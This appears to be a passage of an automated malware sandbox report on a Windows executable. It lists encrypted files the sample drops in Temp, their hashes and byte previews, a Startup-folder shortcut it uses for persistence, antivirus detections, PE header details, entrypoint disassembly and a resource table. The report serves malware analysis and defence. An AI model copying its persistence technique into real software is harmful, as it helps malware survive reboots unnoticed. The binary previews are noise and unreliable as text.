                                                                                                Preview:."1M..q..}H.R.I.iZ...F...?..E.$..'...W......\.!{yO...@.5..k.....C..xy...&9c.....3M.2.....sE..G.IKbH..[.-.......?.6M..pVZ..... .@.._.TR.J6.En..&....\X...I.L...@..J.7S.,..H'.A'.!<.b...Y..Y,x....q.%G..iy....+...`W..N2..Xp-....^......+UV.tF...IRF..#.tz.C....w....\....~..{...?..:~d..1.:..yf.H........4.<_I.>.S.`C.3#Q..Q^./.q.)&......:@.@...A.C..j.\*a{.....?...;4...H...,*.yB.BY.w.7.....@..v..cI....R......0e.6..L.0.....A.y.+..r.E.lv.ki..7_..[.o....T..rJ.G..ghiS_.0.g.8...]...d..{..e.......w|nE..e..`...c.P....d...k?.G..u.E~.A69.u.m....L.b...R.....h.i.....5...ZGVy.;p.C...........9.f..0...D..a=q..T-.5.A.rz.?%F.y.A...B.^Z.e.l+.......%.../.`#NG..KD...eY.a.B;?y>..}.lk=..%dn2x........{.....`+..nH.C......b.R68...?...2..<.........b...R.i..p..h..k~....z4..p<%....y.qbX..c ...jj..}#d.m.....NED..m..t.8..@...4-...Lb.y...\.B6...~....h.<2.t.....78.w..Kw.T.5(....6.8.|U.x..qE...@6.1..t|...m|..L.....d.,.o+_6....Cb....:.....c`.....^).w..S.C..p;..X.!...'.F.EI..^...q..?.d2.R..?

                                                                                                C:\Users\user\AppData\Local\Temp\Graham

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64242
                                                                                                Entropy (8bit):7.9970404192184175
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:EYSrSiuhzP87W8gyR4ETu85vxfMJLLBpsSH/9MBlIFpQBMNf:EYSrvoDggdETu85pfMJ9/jFCE
                                                                                                MD5:8D5698BAF31358D4A2093B7B8DE7AF12
                                                                                                SHA1:DE9CF768AC00A6E3296A0F1E5A9F357D3A94ABBF
                                                                                                SHA-256:D074272CDA941AE39748B778802A0077DB27DB94B36B6C1646B29A865485C921
                                                                                                SHA-512:6FAD82C67BFE5F7E6015FD1121AE56EF0BAF0DB237587CB5CF6E8B38C5FCD3EA045956840016DF5D8D6CAE26E2CA3D9CFF3A68790929776C51BAF012D916E345
                                                                                                Malicious:false
                                                                                                Preview:#.tm..(.T.[.-ykh..2...a.Wp.....+.L..5.._,...W....|C.[.G_..D.XQ.'.H..Y.g.`....4...P.....,Q.K...i[g..E...>......(a..p..Y.f.....+b........U...(^JC.....Z.V.,x#.n...7P...d.:e.......GqnUV...f..=(.+...*.....i....6.X......j....e...xR.a41*$....7..Y94X...B...l..iJ....Z....M\n`.2.+Rd}...sM.@y=.&.<U. &l.y.a..0...i.q,...O...W..._..$..~p$.~.K..^.e.'$...~P=....g6.o^rh...?...o.....j.Nm.~..y..G....5.......>.&8.|..Z....*.|0_...5...|.N.t..u..po...A.......So..9........poW....L..B&.".....VZ..sf....\..pD...v..6.LF.-..z...c..+.?\.........F.IR...,....."..........g.w.N..S.?t6..?..,..v.)8~)...J.U...'F....S.'V...!.d.,.n[.C8...O.1..q(.7.|.M......L....0.v...'1.~h8.z7w0.*9)..[o'..A.M....QS"....]...h.~a$Q@...K..+6......y-..6....}.....flq3"....c..W...p.D...Sc?=.|..mP?...]..&.8rb{.B.%.]|k>hu.......*.Q.]..$A.....0.'.]...A..........,2q.]....iH-w.h.w.........{P.jY5.."..R..|."....n.......p.-.0..tDfk.K...;..s.....H.,.'.0c.Hz..W........65.\.[.e.tS.;.`+_.....~..!..._........v..W.....

                                                                                                C:\Users\user\AppData\Local\Temp\Guarantees

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):75776
                                                                                                Entropy (8bit):7.997722959615335
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:4lspfNMr52MqzS7eaV5ymq/+9+DfY3Z7apvVKbQ2qwZRh:Gs/8sMnea+mq/AofY3ZScYyRh
                                                                                                MD5:AC78F4295147DD78728B3CD885994601
                                                                                                SHA1:02AD7E59305D597D2D124AADB0114A54D9E93131
                                                                                                SHA-256:0068DD4901E587275A2F8212BAECC921105727C2A7172F9C34FD374BF1D28ACA
                                                                                                SHA-512:A5E8C1BC1DDEA9976C2E783C23F4B012FD4424226F79A09C5A85E5CF47834E54D4ADF55C25BC1DC67295880546FA88CC205F2D97F87C3CFE4F7CD962F2B8F710
                                                                                                Malicious:false
                                                                                                Preview:l...../....w.}..J..Lr4....T......-J....V...8]-I..%`..4...f*..>.Y.5l`..n..#{.Gvuo..=...n..rZX..y|B...p..C|.\M;BE]F..?{...E...-...ez...R...v~.dBVS...r.y....JQH...A....pIV.v.......2xl..1.{._..E.k.....n....E*..~.7,.........p.]BR..<....DXj..*.."e1 =E&v.n..</...?1.b.I..$BS......i)......=.t..TO...'2..$.).#....F...jF..C...Y..............]G:=.......^9K.!zOB.j.l.L...5..T.q..&........j}.q.......na;.........d.............._^..>{.Y.J%..........t.$>.bD..w.q...a.6.3=.......~...Z9.7.9 IKg?.....r *S@ }.%..H.b-.S}...i.....|S.9Ww..M\.#...dM.l......H..D.}@......'.d.S9.Ar!.\=5.f....T.X...d:.1<...I..]K.......a....^..l......^..D...."8P....]id....HJ...b...lp.0{.s...Ti.d~6=l..~.s...]..f........c..Ljk.=...omG.L!B.$..CM....L.q....e.........AQL.8[..+..U.,,...&.. ..h..U.pW.O.;iA..'.......r.t........q .e/...kP.....v.8.`(.*.9......DA..............q4I.....k.R~...BV....U.)_'..Ey0.+.[.L.=PCO|..L...e_..$.iN5[.)..r.%j.R...d...@.4....r.=.....4r.V@5v:.(.'....?Y=.G..

                                                                                                C:\Users\user\AppData\Local\Temp\Mat

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):65536
                                                                                                Entropy (8bit):7.996496070137627
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:XFwmIU0p3NC7zIIwNdTTcibByrCj5C+fq/KtY5j7qw/oDBZ2htcAkgS:XF/I947snN5TC+j5CDKW5j2VVQc2S
                                                                                                MD5:B9DB27B33BA9766E06F74BA1F1CB6BF5
                                                                                                SHA1:CCE86321F146261B8346F1B733A404FC0056BD42
                                                                                                SHA-256:819EE9026D354CB095977ED0DBB712EF57DEFD58B7049479F2D510021FEE2F72
                                                                                                SHA-512:50ECFE14D5660C8E48963920678E41D0D7CD7059ACD39221A3922B24164586BDB56C43FE263180BEDA6F568C4BE7675D8228A4AF7E3D0413E4A693A629203EE1
                                                                                                Malicious:false
                                                                                                Preview:...x......j"...]' Q.~64NfYs..t.....G....n..Y.^...d.e.x)..-....H.M...2..C..q...ySv.u[F.=.Y.........c...q~.....o..........F...3.........ce.S.I.... .......72....Y.q#7.= Z.>C.@H-%....o)......S...L..M....K.........y.......o..1..O,...'\##.i.Z..i...d.u...:E...gW.%F..Z....A..=...H.L....".%.WK..."..R:A...4..w...]b.....?.8.n7K.>*;z..b...pZV...6e.......i..Za...f.<.......g.M;.....Q.JE.o.........n.H..O..GL..;t.X.6.....sfa.Zm..u....SM^cD".[^T.=...v.I.B...t.b...U.....=k.s..{U/.M...`_..............9R.a6..<E...x....b+..N..wBi|Q.).=S....z.....Q..d.L.......0....%..."..,_..0o.s...`|....A...*Q,.!v.c..vDv.z....+.|V.&Z..b.......Qu.y.....=%.S-..S.....hR.a....\>..qR....D.^.....W!@...gw!.H....C|j.O..T.....!.....D;..8{...Y../..OS..._..urV..x.\.E.1.F%....g^.E...Z.m..1...K...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.

                                                                                                C:\Users\user\AppData\Local\Temp\Pros

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):94208
                                                                                                Entropy (8bit):7.998117271685134
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:xJIg4wNuUxMZaTYof1PetjGwqdklraGeYHeT2tKrrJkq77+lewKeEiMNfNQgYbpQ:d4wTMZa1PQjGvkF1AT7NvmNKtiMrYdxe
                                                                                                MD5:EBF80A135FF0E39E78E85797D890B97B
                                                                                                SHA1:9ED47495858F2B7C11F5FB0586F4F4209CDDAB85
                                                                                                SHA-256:B99898ED2F34A33A84B235CE4B8C6C260814C3B3B547B38400F82BFE6C89262B
                                                                                                SHA-512:6A1960CD692D9EA90C3DE0964C592AD6D4A6B5597869F748174760FEB69D73F51E2E19177083139E339ACD961BD3B7C78EAA9FA871DB6C519EB90E724A8D5869
                                                                                                Malicious:false
                                                                                                Preview:..p..y.}}_.k.-.*TA.....o.F....W9.H..5..'. .A..s...at8.....|...U|.LH....,c........?..J.!...cJdN..Wclz)~.G..L.&.3..!.......?..pb........a.K.NZ...,...cc...9..'....f5.............~_6...s)v...I.RU..x(...W..._......}.A.....~...h.,UnS.j...>..tL2P.]...VT...+.G.]^"...O..m...l.....vz.+b..Q+......x1.o..3....45eJz...`(y0.4..Z........?*....D..N..l*..(h.?...nc-.Z..T.0..u...k..2J....,.r...1F.[.3K...^...:k.k=... ....~..5=|ffy4.q..C%^O.....7......3f*$d.#iG.........F<%>..R..]Jne8. !3..s..w.C..u.|...9.}.ai.........(...a.<.\.v.I...Q1mr.2.D...$..m)|..t..]....v.J^.4b5I.4...J.M..N:.{......./AVBkf.;Dq..#?h..{r.....q...rF7.....+...i..p.s..V*.A.m}.....1...wxq.a.W.z..$.#..0lxB!.....&0g..{ c..g{.N5...pf._8...n..............X.....p..c..m..X.[Iq2../3.l.........!tA...e........".M....vo......?n.U..Ar...b.#`"..i.L...^&N./.-.bD.F.....sb.3%..o.....%..`.p..z.*Y...|6.x.P.E...fYm..%..u+.w#.p.'B.U..N4.x.w..N..PV...Ld.S.|.......#gD[...]c.(.)G.....p..O...u'..........+..a....\

                                                                                                C:\Users\user\AppData\Local\Temp\Stylus

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):58368
                                                                                                Entropy (8bit):7.99739998700173
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:SAf14eonXf2WkM5AqL6uzIdfec1ierfc0D/N:SAf6r2gOaCf9rD/N
                                                                                                MD5:B8A70405AEB003272EBE394EF1EB4A7D
                                                                                                SHA1:EDD8EC3D3FE6B6C99AC5C7E98EF260E1301FA54B
                                                                                                SHA-256:C972FC290924DB797196796C434F5A24EDE99FDF80E551A5DC3A06E3975057AB
                                                                                                SHA-512:129DF6A35B6BCBBBEDCBB34C422138BD0B1D989CCBBF32A0166930E382EA38123EE4C311F199E909C8BF884891C0BD8F817D89D3E587B35E2635588364BD4CEB
                                                                                                Malicious:false
                                                                                                Preview:.].w.I.&.@{..;i.Me.y}.i..)..l.....<...'....f.w.....n......a..=...a.H..FuF)j.|a.t...3.~PN4..b..j.......)..3..g.qUrVs.......*.L...6D...E.$?.F.Eq.e..W....=......I.l"\\^.....3....+.P.V.LFjQ..N.{Qjic..K...z.0.............p.S..;.Skc *.......p. ..A.2v.........*.]7V.^.tD.@....KI\...$_g.....Ey.%u..l.#...F8......~..N..j....~N.?S.2N....O.l....b|.4.[#E/..2.:.G..G.|..`.W"<<..9%J.R......@.S|.qX.w$..>w....dU^..!.Ie,F.V..i0...@e..._..*..&......A.M.....o.P..~.....8..@.C.8.;./.jC|.Q.[tGgT.@..E)0.N....?..@......RZ...+.....?....p*.W.;.a...4..}.e.%..>..S.*ga..5s..X.k..=..7b.J..0ZA..H.-.M3.{?...*{..zz3.)).F..I`.lF.X....E.K"G.j..:w. ........t....v.h...........e...J...w.[..0......:...x..0..f......`..m..!.I...{....e..K...))P........i...6.n.7.g.?...D.j..r...#.j....Z=........]d.......A%`.N..'.....\..U..}.....a.iJ(.x..cOd.L..;m...x....Z...%.....A7......P..;)4B:..<..{0.. .......t.L.0....dR.W...43....Fk....p%l../`.......-e..".s....%.X`l..S..yjw.!|...K.**.n.t...lms..`...

                                                                                                C:\Users\user\AppData\Local\Temp\ywezrgl.exe

                                                                                                Download File
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:modified
                                                                                                Size (bytes):1218642
                                                                                                Entropy (8bit):7.976937494490407
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:E4t5TY9aBRuxpPk92C48uKcuNaHHP/Wx4wbdqXReE9UOsPhv1daUsC:5YaBRuxu9r4XKc/HHP/WxHbwoEGH0s
                                                                                                MD5:8B55759C053EC89DC1EAE85D043441A9
                                                                                                SHA1:AF350E100DC7178DE3BC1C166599E99AE29268EE
                                                                                                SHA-256:B66989CE2388271F471E38DD4F8CCA5DA3A47663DCB253E77E464AC7328C1A32
                                                                                                SHA-512:C4815AFD42A620201C34AA7DAE33990AE085FD76CE181A9E2B1BD2FBDB7E9841495F96B56F03A5BBA818F95DF61DF8D809FE25AA623274257CE14DA78D2B627A
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 54%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@.................................).....@.................................4........@...2...........u...(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....2...@...4..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesSync.url

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js" >), ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):92
                                                                                                Entropy (8bit):4.8189313866931185
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:HRAbABGQaFyw3pYoUkh4E2J5hE2LSuySHq:HRYF5yjo923PSvSHq
                                                                                                MD5:ED6F8A557BFD3FFA4753B515BE13222D
                                                                                                SHA1:B911430D417E2F839E0655498613CADCC71C9813
                                                                                                SHA-256:1C3C35BC83571ABE8F8E91DDA60EB26020A4BE8ABC3185417FF500E7493A70A4
                                                                                                SHA-512:D1D3E4103317C8349BA5CB6750D326202D050020FD2554FF11B861AC9228E82A02B2173B4BE0C80DACBCEF91C538F04FD5C85EB99475C58A60CA08A6B6FF8819
                                                                                                Malicious:true
                                                                                                Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js" ..

                                                                                                C:\Users\user\Pictures\QuickTextPaste\Bin\QuickTextPaste.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):979567349
                                                                                                Entropy (8bit):0.029153077329722242
                                                                                                Encrypted:false
                                                                                                SSDEEP:
                                                                                                MD5:E1C67F1434F1C4940A569D54928983D9
                                                                                                SHA1:B2AD0EFFBB4A4D4F3CA5B8118E35F529AA63E90E
                                                                                                SHA-256:DDF44DCD79B66AE828893C36760145CC1E2203784048D4E06C6175A699670AE9
                                                                                                SHA-512:6BB215ADCB404094430C9555C9C4DE83B17CA55B146725EF4B52A92F109CF6F45E8D49B0AAAC8B29CEE6363ADEBD6E8CC01D6A5578E3ABE49D33EAABA7FF2729
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................................................9......._.....Rich...................PE..L.....7g.............................~............@..................................D..................................................h............"...)..............................................................4............................text.............................. ..`.rdata...w.......x..................@..@.data........@..."... ..............@....rsrc...h............B..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):7.543082592696015
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:file.exe
                                                                                                File size:1'651'200 bytes
                                                                                                MD5:0a8711fa1cb4189ab364c217db5f3620
                                                                                                SHA1:94ee709ab608d9d4ed6143a1deae85dd9fd812b3
                                                                                                SHA256:437c785b2093ffb955f17d63758cfb10e741509415cc55de8050e2d918716a4a
                                                                                                SHA512:8176f9534103704ef3b28ed2c5ab5f79cc7a19ee535017a763727b365d7825d3bb2ddf9a9fc3eae13eac4e3cfa95ce6887362d564db2c0440d0dab5cfdb1ebab
                                                                                                SSDEEP:24576:Y/WWf67etHLvLdh+dLNuK5imSFRWct3BfA59jACSr6ggTan9mTYdGvhH0WygS:Uf66tXdh+147YcXIfUCc6bG9DgS
                                                                                                TLSH:6F75CF45FF84851AD2D301BAE61261C4E6469EB1AC0284177EDB7B5FFB38A824F13F16
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9..........._.......Rich....................PE..L.....7g...

                                                                                                File Icon

                                                                                                Icon Hash:0f2fcaabb0aaf830

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x437ee0
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                DLL Characteristics:
                                                                                                Time Stamp:0x67371DD6 [Fri Nov 15 10:09:26 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:e65d5d56989c1441945255d78668884e

                                                                                                Authenticode Signature

                                                                                                Signature Valid:
                                                                                                Signature Issuer:
                                                                                                Signature Validation Error:
                                                                                                Error Number:
                                                                                                Not Before, Not After
                                                                                                  Subject Chain
                                                                                                    Version:
                                                                                                    Thumbprint MD5:
                                                                                                    Thumbprint SHA-1:
                                                                                                    Thumbprint SHA-256:
                                                                                                    Serial:

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    push FFFFFFFFh
                                                                                                    push 0043D1E8h
                                                                                                    push 00438066h
                                                                                                    mov eax, dword ptr fs:[00000000h]
                                                                                                    push eax
                                                                                                    mov dword ptr fs:[00000000h], esp
                                                                                                    sub esp, 68h
                                                                                                    push ebx
                                                                                                    push esi
                                                                                                    push edi
                                                                                                    mov dword ptr [ebp-18h], esp
                                                                                                    xor ebx, ebx
                                                                                                    mov dword ptr [ebp-04h], ebx
                                                                                                    push 00000002h
                                                                                                    pop edi
                                                                                                    push edi
                                                                                                    call 00007FC3EC804BE1h
                                                                                                    nop
                                                                                                    pop ecx
                                                                                                    or dword ptr [004808F4h], FFFFFFFFh
                                                                                                    or dword ptr [004808F8h], FFFFFFFFh
                                                                                                    call dword ptr [0043C330h]
                                                                                                    mov ecx, dword ptr [004808C8h]
                                                                                                    mov dword ptr [eax], ecx
                                                                                                    call dword ptr [0043C2ACh]
                                                                                                    mov ecx, dword ptr [004808C4h]
                                                                                                    mov dword ptr [eax], ecx
                                                                                                    mov eax, dword ptr [0043C234h]
                                                                                                    mov eax, dword ptr [eax]
                                                                                                    mov dword ptr [004808F0h], eax
                                                                                                    call 00007FC3EC83BBEDh
                                                                                                    cmp dword ptr [00456140h], ebx
                                                                                                    jne 00007FC3EC83BAAEh
                                                                                                    push 00438096h
                                                                                                    call dword ptr [0043C238h]
                                                                                                    pop ecx
                                                                                                    call 00007FC3EC83BBBFh
                                                                                                    push 004440ECh
                                                                                                    push 004440E8h
                                                                                                    call 00007FC3EC83BBAAh
                                                                                                    mov eax, dword ptr [004808C0h]
                                                                                                    mov dword ptr [ebp-6Ch], eax
                                                                                                    lea eax, dword ptr [ebp-6Ch]
                                                                                                    push eax
                                                                                                    push dword ptr [004808BCh]
                                                                                                    lea eax, dword ptr [ebp-64h]
                                                                                                    push eax
                                                                                                    lea eax, dword ptr [ebp-70h]
                                                                                                    push eax
                                                                                                    lea eax, dword ptr [ebp-60h]
                                                                                                    push eax
                                                                                                    call dword ptr [0043C240h]
                                                                                                    push 004440E4h
                                                                                                    push 00444000h

                                                                                                    Rich Headers

                                                                                                    Programming Language:
                                                                                                    • [C++] VS98 (6.0) SP6 build 8804
                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x418e80xdc.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x810000x13ef68.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x722000x2908.data
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x3c0000x634.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x10000x3a2ea0x3a400273ee57b0ef8ce183e406b6421895504False0.52072575777897data6.827215242326264IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rdata0x3c0000x77cc0x780091c6ff2fd3bb8dc0dd623e04098000efFalse0.3382161458333333data4.707298007686286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .data0x440000x3c8fc0x12200044dced594e170048a01f833f33579cdFalse0.8952586206896552data7.634244653448693IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .rsrc0x810000x13ef680x13f0004fe4dac5953a7f342172d5df1db9dfa7False0.7261392718945925data7.5774250049995295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    PNG0x81f6c0xefecdata0.9566916313904266
                                                                                                    TEXTINCLUDE0x90f580x49ASCII text, with CRLF line terminators1.0136986301369864
                                                                                                    RT_BITMAP0x90fa40x3668Device independent bitmap graphic, 512 x 54 x 4, image size 13824, 16 important colorsGermanGermany0.16082711085582999
                                                                                                    RT_BITMAP0x9460c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128GermanGermany0.3620689655172414
                                                                                                    RT_BITMAP0x946f40xd4Device independent bitmap graphic, 18 x 9 x 4, image size 108GermanGermany0.42924528301886794
                                                                                                    RT_BITMAP0x947c80x158Device independent bitmap graphic, 32 x 15 x 4, image size 240GermanGermany0.3081395348837209
                                                                                                    RT_BITMAP0x949200xd4Device independent bitmap graphic, 18 x 9 x 4, image size 108, resolution 2867 x 2867 px/m, 16 important colorsGermanGermany0.6132075471698113
                                                                                                    RT_BITMAP0x949f40x3e8Device independent bitmap graphic, 112 x 16 x 4, image size 896GermanGermany0.303
                                                                                                    RT_BITMAP0x94ddc0x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 1152GermanGermany0.04856687898089172
                                                                                                    RT_BITMAP0x952c40x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 1152GermanGermany0.04856687898089172
                                                                                                    RT_BITMAP0x957ac0x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 1152GermanGermany0.04856687898089172
                                                                                                    RT_BITMAP0x95c940x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 1152GermanGermany0.04856687898089172
                                                                                                    RT_BITMAP0x9617c0x1aa8Device independent bitmap graphic, 128 x 105 x 4, image size 6720GermanGermany0.011137162954279016
                                                                                                    RT_BITMAP0x97c240x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 1152EnglishUnited States0.04856687898089172
                                                                                                    RT_BITMAP0x9810c0xd10Device independent bitmap graphic, 144 x 45 x 4, image size 3240GermanGermany0.0215311004784689
                                                                                                    RT_BITMAP0x98e1c0x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 1152GermanGermany0.04856687898089172
                                                                                                    RT_ICON0x993040x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0GermanGermany0.3398014440433213
                                                                                                    RT_ICON0x99bac0x568Device independent bitmap graphic, 16 x 32 x 8, image size 0GermanGermany0.24783236994219654
                                                                                                    RT_ICON0x9a1140x128Device independent bitmap graphic, 16 x 32 x 4, image size 192GermanGermany0.3783783783783784
                                                                                                    RT_ICON0x9a23c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640GermanGermany0.1827956989247312
                                                                                                    RT_ICON0x9a5240x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsGermanGermany0.2668918918918919
                                                                                                    RT_ICON0x9a64c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.7322695035460993
                                                                                                    RT_ICON0x9aab40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.4294090056285178
                                                                                                    RT_ICON0x9bb5c0x368Device independent bitmap graphic, 16 x 32 x 24, image size 832GermanGermany0.6353211009174312
                                                                                                    RT_ICON0x9bec40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.5032833020637899
                                                                                                    RT_ICON0x9cf6c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320GermanGermany0.3432080924855491
                                                                                                    RT_DIALOG0x9d4d40xbcdataGermanGermany0.7287234042553191
                                                                                                    RT_DIALOG0x9d5900x98dataGermanGermany0.7763157894736842
                                                                                                    RT_DIALOG0x9d6280x5adataGermanGermany0.8111111111111111
                                                                                                    RT_DIALOG0x9d6840xa4dataGermanGermany0.7012195121951219
                                                                                                    RT_DIALOG0x9d7280xa8dataGermanGermany0.7797619047619048
                                                                                                    RT_DIALOG0x9d7d00x3b6dataGermanGermany0.4610526315789474
                                                                                                    RT_DIALOG0x9db880x36dataGermanGermany0.7962962962962963
                                                                                                    RT_DIALOG0x9dbc00xcadataGermanLiechtenstein0.6782178217821783
                                                                                                    RT_DIALOG0x9dc8c0xb6dataGermanGermany0.6813186813186813
                                                                                                    RT_DIALOG0x9dd440x80dataGermanGermany0.796875
                                                                                                    RT_DIALOG0x9ddc40x90dataGermanGermany0.7361111111111112
                                                                                                    RT_DIALOG0x9de540x90dataGermanGermany0.7361111111111112
                                                                                                    RT_DIALOG0x9dee40x90dataGermanGermany0.7361111111111112
                                                                                                    RT_DIALOG0x9df740x90dataGermanGermany0.7361111111111112
                                                                                                    RT_DIALOG0x9e0040x90dataGermanGermany0.7361111111111112
                                                                                                    RT_DIALOG0x9e0940x90dataGermanGermany0.7361111111111112
                                                                                                    RT_DIALOG0x9e1240x90dataGermanGermany0.7361111111111112
                                                                                                    RT_DIALOG0x9e1b40xa6dataGermanGermany0.7469879518072289
                                                                                                    RT_DIALOG0x9e25c0x90dataGermanGermany0.7361111111111112
                                                                                                    RT_DIALOG0x9e2ec0x90dataGermanGermany0.7361111111111112
                                                                                                    RT_DIALOG0x9e37c0x90dataGermanGermany0.7361111111111112
                                                                                                    RT_DIALOG0x9e40c0xf2data0.6776859504132231
                                                                                                    RT_STRING0x9e5000x80dataGermanGermany0.453125
                                                                                                    RT_STRING0x9e5800x50dataGermanGermany0.6625
                                                                                                    RT_GROUP_ICON0x9e5d00x22dataGermanGermany0.9705882352941176
                                                                                                    RT_GROUP_ICON0x9e5f40x14dataGermanGermany1.25
                                                                                                    RT_GROUP_ICON0x9e6080x14dataGermanGermany1.2
                                                                                                    RT_GROUP_ICON0x9e61c0x14dataGermanGermany1.2
                                                                                                    RT_GROUP_ICON0x9e6300x14dataGermanGermany1.25
